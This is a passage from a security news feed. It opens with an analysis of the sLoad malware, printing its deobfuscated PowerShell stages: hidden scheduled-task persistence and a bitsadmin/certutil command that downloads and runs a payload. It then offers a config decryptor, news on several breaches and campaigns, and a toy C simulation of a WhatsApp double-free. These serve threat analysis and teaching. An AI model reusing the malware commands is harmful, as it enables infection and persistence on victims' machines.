  $wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
  $5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
  […]
  $5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
  $5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
  start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
  $2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim ';
  […]
  $nz0oninX6=$ixXApGeqJKEGY -join ',';
  $E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
  start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  $u2K2MQ4 = "`r`n";
  $lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  $yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';
  $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  $Erlydj = $Erlydjiyy.UUID;
  $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
  If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
  try{ Remove-Item $Z5lTNXB'\*'}catch{}
  $wsxDITPgQCH="76492d1 […] A1AA==";
  $wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
  $5r8DcJB4ok4="7649 […] AGIA";
  $5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
  start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';
  $2aWxu9dutZfOPCCgS="Dim winssh […] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true";
  $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'
  $r1uIiPZBhUea0=" $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}";
  $r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'
  $nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
  $E6M6Np8nhXnu4ndPEJ="/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp";
  start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like the previous script, this one performs the same operations and creates another four files in the “%AppData%\Roaming\<active_process>” path. This time the files are:

  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of the “<random_name>.ps1” file is the following. This latest script decrypts the content of the “config.ini” file. The following figure shows the “config.ini” file both encrypted and decrypted.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operations described for the “main.ini” file but uses different URLs stored in the “web.ini” file. This time too, the file is decrypted using the integer array from 1 to 16 as key, contained in the “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption
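Both the “main.ini” decryption described earlier and the “web.ini” decryption here use the same container, so one added helper covers both. It is written for this article, not code from Yoroi or from the malware, and it reproduces and reverses the ConvertFrom-SecureString -Key format so a captured .ini can be decrypted offline without PowerShell. The container layout it assumes (the 76492d… header, then base64 of a UTF-16LE "2|<base64 IV>|<hex ciphertext>" string, AES-CBC with PKCS7 padding over UTF-16LE plaintext) is taken from PowerShell’s SecureString export format; the sample config line, C2 hostname and IV are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Fixed header PowerShell prepends to a SecureString exported with -Key (the
// "76492d11..." prefix visible in main.ini and config.ini). Assumed format.
const secureStringHeader = "76492d1116743f0423413b16050a5345"

var sLoadKey = []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16} // @(1..16), AES-128

func utf16le(s string) []byte { // a .NET string's in-memory encoding
	u := utf16.Encode([]rune(s))
	b := make([]byte, 2*len(u))
	for i, v := range u {
		binary.LittleEndian.PutUint16(b[2*i:], v)
	}
	return b
}

func fromUTF16le(b []byte) string {
	u := make([]uint16, len(b)/2)
	for i := range u {
		u[i] = binary.LittleEndian.Uint16(b[2*i:])
	}
	return string(utf16.Decode(u))
}

// ExportSecureString reproduces ConvertFrom-SecureString -Key (assumed layout):
// header + base64(UTF-16LE("2|" + base64(iv) + "|" + hex(AES-CBC(PKCS7(UTF-16LE(plain)))))).
func ExportSecureString(plain string, key, iv []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != aes.BlockSize {
		return "", errors.New("bad key or IV length")
	}
	data := utf16le(plain)
	pad := aes.BlockSize - len(data)%aes.BlockSize // PKCS7: always 1..16 bytes
	data = append(data, bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, data)
	inner := "2|" + base64.StdEncoding.EncodeToString(iv) + "|" + hex.EncodeToString(ct)
	return secureStringHeader + base64.StdEncoding.EncodeToString(utf16le(inner)), nil
}

// ImportSecureString reverses the export: what the sLoad stages do with
// ConvertTo-SecureString -key followed by SecureStringToBSTR/PtrToStringAuto.
func ImportSecureString(exported string, key []byte) (string, error) {
	exported = strings.TrimSpace(exported)
	if !strings.HasPrefix(exported, secureStringHeader) {
		return "", errors.New("missing SecureString export header")
	}
	raw, err := base64.StdEncoding.DecodeString(exported[len(secureStringHeader):])
	if err != nil {
		return "", err
	}
	parts := strings.Split(fromUTF16le(raw), "|") // "2|<base64 IV>|<hex ciphertext>"
	if len(parts) != 3 || parts[0] != "2" {
		return "", errors.New("unexpected container layout (not a -Key export?)")
	}
	iv, err1 := base64.StdEncoding.DecodeString(parts[1])
	ct, err2 := hex.DecodeString(parts[2])
	block, err3 := aes.NewCipher(key)
	if err1 != nil || err2 != nil || err3 != nil || len(iv) != aes.BlockSize ||
		len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("bad IV, ciphertext or key")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || pad > len(pt) {
		return "", errors.New("bad PKCS7 padding (wrong key?)")
	}
	return fromUTF16le(pt[:len(pt)-pad]), nil
}

func main() {
	// Constructed demo (no full sLoad .ini survives on the page): export a made-up
	// config line with the malware key and a fixed IV, then recover it.
	exported, _ := ExportSecureString("hxxps://c2.example.invalid/doc/x2401.jpg", sLoadKey, []byte("0123456789abcdef"))
	fmt.Println(exported[:48] + "...")
	fmt.Println(ImportSecureString(exported, sLoadKey))
}
```

A main.ini written by Windows PowerShell’s out-file default is itself UTF-16LE with a BOM on disk, so decode the file to a string (dropping the 2-byte BOM) before passing it to ImportSecureString.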

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis all the C2 URLs seemed to be down, so we were not able to identify the final payload family.

  $dPath = [Environment]::GetFolderPath("MyDocuments")
  $jerry=$starsLord+'\'+$roccon+'_'+$rp;
  $clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
  start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  $clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
  start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of the sLoad infection chain, we compared attack attempts observed since 2018 with the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with a zip archive containing two files. In the first case the starting point is a “.lnk” file, and in the second one the chain starts with a “.vbs” script.

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique became more detectable over time, so it could have been deprecated in the latest infection attempts. For both malware variants, the archive contains a legitimate image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages use a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in its core structure; however, the bot now supports new commands such as “Exec” and “Eval”, the latter able to download further code through the Bitsadmin utility instead of relying directly on the “Net.WebClient” primitive. Also, the “ScreenCapture” function has been removed from the new version of the code, in favor of enhancing the agent’s persistence through scheduled tasks.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad keeps evolving its TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by the Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels makes detection of this threat difficult for automated systems, and frequently requires analysis skills or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, which many times target just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability affecting the Android kernel’s binder driver; it could be exploited by a local privileged attacker or a malicious app to escalate privileges and gain root access to a vulnerable device. Experts warn it could potentially allow a full compromise of the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.”

The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices on the market with the unpatched kernel are still vulnerable to this issue, even if their owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, as the issue is reachable from Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a security patch as part of its October Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

The post Project Zero researcher found unpatched Android zero-day likely exploited by NSO group appeared first on Security Affairs.

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt’s government has been spying on citizens in a sophisticated surveillance program.

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The experts started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims who were tricked into downloading the malicious apps, which posed as useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on that claimed to improve security; iLoud200%, a smart storage solution that would supposedly free up storage space on the victim’s device; and the IndexY caller ID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

The experts also detailed the command and control infrastructure used over time. The attackers used a range of domain names that included words like “secure” and “verify” to avoid raising the victims’ suspicion.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory exposed online, allowing the experts to analyze its content, a collection of files uploaded between May and June.


“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence, such as a server registered to the Ministry of Communications and Information Technology in Egypt, suggest that the operation might be government-backed.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG.

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG. The name comes from the threat actor using PlugX inside ZIP archives containing the ASCII magic bytes “PK” in the header.

“For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report.” reads the report published by Palo Alto Networks. “We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking.”

The hackers targeted entities in the Southeast Asia region; most of the victims were in Myanmar, Taiwan, Vietnam, and Indonesia. Experts believe that PKPLUG also targeted other areas of Asia, including Tibet, Xinjiang, and Mongolia.

The China-linked APT group has been active for at least six years and has used both custom-made and publicly available malware.

Researchers at Palo Alto Networks’ Unit 42 reported that some of the tools used in the campaigns were also involved in attacks carried out by other threat actors.

The experts observed the threat actor mainly delivered the PlugX backdoor, but the attackers also used the HenBox Android malware, the Farseer backdoor for Windows, the 9002 and Zupdax trojans, and Poison Ivy RAT.

Below is the timeline of the PKPLUG attacks over the years:


The first campaign associated with PKPLUG was observed in November 2013, when the group targeted Mongolian individuals with the PlugX RAT. In April 2016, researchers from Arbor Networks uncovered a campaign aimed at delivering Poison Ivy to targets in Myanmar and other countries in Asia. A month later, Unit 42 researchers spotted another campaign that targeted entities from Myanmar, the Uyghur minority, Tibet, Vietnam, Indonesia, and Taiwan with the 9002 Trojan.

In March 2017, the Hong Kong-based cybersecurity company VKRL spotted a campaign targeting entities in Mongolia. One year later, in March 2018, Unit 42 experts spotted a campaign involving a new Android malware family named “HenBox.” The hackers primarily targeted the Uyghur minority.

In early 2019, Unit 42 researchers discovered a previously unknown Windows backdoor Trojan called Farseer that was used by the threat actors in attacks against targets in Myanmar. The experts noticed overlaps between the infrastructure and the malware used in the different campaigns.

“Overlaps between the different campaigns documented, and the malware families used in them, exist both in infrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of malicious traits (program runtime behaviors or static code characteristics are also where relationships can be found or strengthened).” continues the analysis.

In at least four of the six campaigns, the threat actors used a shared set of IP addresses as command and control (C2) infrastructure.

Researchers also discovered that attackers used the same registrant for various domain names hosted at those addresses.

“Based on what we know and what we’ve gleaned from others’ publications, and through industry sharing, PKPLUG is a threat group, or groups, operating for at least the last six years using several malware families — some more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.” concludes the analysis. “Unit 42 has been tracking the adversary for three years and based on public reporting believes with high confidence that it has origins to Chinese nation-state adversaries.”

Pierluigi Paganini

(SecurityAffairs – PKPLUG, China)

The post 6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group appeared first on Security Affairs.

FBI warns about high-impact Ransomware attacks on U.S. Organizations

The U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) warns organizations about high-impact ransomware attacks.

In the wake of the recent string of attacks against cities, school districts and hospitals, the U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) issued a warning to organizations about high-impact ransomware attacks.

“Ransomware attacks are becoming more targeted, sophisticated, and costly, even as the overall frequency of attacks remains consistent.” reads the public service announcement published by the IC3.

“Since early 2018, the incidence of broad, indiscriminate ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information. Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector.”

The FBI has observed cybercriminal organizations using multiple techniques to deliver ransomware, including phishing campaigns and the exploitation of Remote Desktop Protocol (RDP) and software vulnerabilities.

The authorities discourage victims from paying a ransom because there is no guarantee that the files will be decrypted. Sometimes the crooks don’t decrypt them after payment; in other cases, flaws in the encryption process or in the malware itself make it impossible to decrypt the data.

The FBI urges victims to report the incident to their local FBI field office and to ic3.gov to receive the necessary support.

“Regardless of whether you or your organization have decided to pay the ransom, the FBI urges you to report ransomware incidents to law enforcement.” continues the announcement. “Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under U.S. law, and prevent future attacks.”

Reporting the ransomware attacks to the FBI will help law enforcement to track the crooks behind the campaign and to collect the indicators of compromise associated with the threat.

Below are the cyber defense best practices shared by the FBI:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets

Pierluigi Paganini

(SecurityAffairs – FBI, ransomware)

The post FBI warns about high-impact Ransomware attacks on U.S. Organizations appeared first on Security Affairs.

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

The Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

Cybercrime is a prolific business: criminal organizations continue to profit from illegal activities in cyberspace, but police are ready to counter them. Cyber experts at the Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

“Cyber police officers, together with investigators of the Main Investigative Directorate of the National Police of Ukraine, under the procedural guidance of the Prosecutor General’s Office of Ukraine, exposed a large-scale service for mass distribution of electronic messages.” states the press release published by the Ukrainian police. “It is established that all works of the service are carried out exclusively at the request of interested clients. With this resource, it was possible to buy activated accounts in large numbers to various mail resources, social networks, payment systems and more. At the same time, verified accounts were also sold, the cost of which was much higher.”

Operators behind the bot farm were offering large numbers of active accounts for multiple online services that their customers used to carry out spam campaigns.

The Ukrainian Police raided houses, apartments, garages and rented offices in six Ukrainian cities (Kiev, Odesa, Lviv, Nikolaev, Rivne, and Kherson) and seized equipment used in the bot farm, including multi-SIM card modems and electronic equipment used to sign up to payment systems.

The crooks were using the SIM cards to register accounts on various services that require a phone number to verify users’ identities. They preserved their anonymity using VPN and Tor services.

Police officers and the Main Investigative Directorate of Ukraine’s National Police carried out searches at houses, apartments, garages and rented offices where the group set up the illegal activity.

To anonymize the bot farm traffic, the operators ran connections through VPN services and the Tor network. Details of how the officers were able to discover the physical addresses remain undisclosed.

Authorities will analyze the seized equipment in an attempt to collect additional information on the crime rings.

“The pre-trial investigation is ongoing within the framework of the previously initiated criminal proceedings under Art. 1889 (Requirement), Art. 258 (Terrorist Act), Art. Measures are being taken to prosecute those involved in the organization of such activities.” concludes the statement.

Today I had the pleasure of writing a post on another successful operation conducted by law enforcement. A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed investigators to track down and seize five servers that made up a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam; they were used by tens of IoT botnets involved in DDoS attacks worldwide.

Pierluigi Paganini

(SecurityAffairs – bot farm, cybercrime)

The post Ukrainian police dismantled a bot farm involved in multiple spam campaigns appeared first on Security Affairs.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

US continues to warn its allies over China’s “predatory approach” especially for 5G technology, this time US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again, the US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries, explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against.”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipment and services for its 5G infrastructure.

In August, Romania announced that it would ban the Chinese giant Huawei from its 5G network, according to a joint statement signed by the Romanian and US presidents.

In April, the British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology from their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019 the company identified approximately 10,000 Zendesk Support and Chat accounts, including expired trial and accounts that are no longer active.

The customer service software firm decided to alert all the impacted users, inviting them to take the following steps:

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one.
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

In any case, customers are invited to change their passwords.

This isn’t the first security breach suffered by Zendesk; the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations appeared first on Security Affairs.

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher who goes online by the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp() function in decoding.c of the libpl_droidsonroids_gif.so library, which is used to generate the preview of a GIF file when a user opens the Gallery view in the popular messaging application to send a media file.

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”
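The aliasing described in the quoted paragraph, reproduced on a toy allocator as an added example (this is not the researcher’s code or the libpl_droidsonroids_gif source): a GifInfo-like struct, a parse path that frees rasterBits twice, a second parse whose object and buffer come back at the same address, and two mitigations, one in the parser and one in the allocator. The allocator, the slot size, the parse sequence and the 0x41 pixel bytes are constructed assumptions.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Field names mirror the write-up; everything else is constructed. */
typedef struct GifInfo GifInfo;
typedef void (*RewindFn)(GifInfo *);

struct GifInfo {
    uint8_t *rasterBits;     /* decoded pixels of the current frame */
    RewindFn rewindFunction; /* called when decoding of a frame finishes */
    int width;
    int height;
};

/* Toy heap (assumption, not the Android allocator): a few slots that are all
 * exactly sizeof(GifInfo) bytes, so the rasterBits buffer and the GifInfo
 * object share one size class, as in the write-up. Frees push onto a LIFO
 * free list, allocations pop; duplicates are allowed on purpose. */
#define SLOTS 4
static GifInfo heap_slots[SLOTS];
static void *free_list[2 * SLOTS];
static int free_top;

static void toy_heap_reset(void)
{
    memset(heap_slots, 0, sizeof heap_slots);
    free_top = 0;
    for (int i = SLOTS - 1; i >= 0; i--)
        free_list[free_top++] = &heap_slots[i];   /* slot 0 ends up on top */
}

static void *toy_alloc(void)
{
    return free_top > 0 ? free_list[--free_top] : NULL;
}

/* Returns 0 on success, -1 if 'p' is already free and 'detect' is set
 * (models an allocator that checks its free list for double frees). */
static int toy_free(void *p, int detect)
{
    if (p == NULL)
        return 0;
    if (detect) {
        for (int i = 0; i < free_top; i++)
            if (free_list[i] == p)
                return -1;
    }
    free_list[free_top++] = p;
    return 0;
}

static void good_rewind(GifInfo *g) { (void)g; }

/* Models the two parses of one GIF in the Gallery view. 'fix' selects:
 *   0: buggy parser on a plain allocator (the bug as described)
 *   1: parser clears info->rasterBits after freeing it (no second free)
 *   2: allocator refuses to free a block that is already free
 * Returns 1 if the second GifInfo's rewindFunction was overwritten by the
 * decoded pixel data, 0 if it survived intact. */
int simulate_gallery(int fix)
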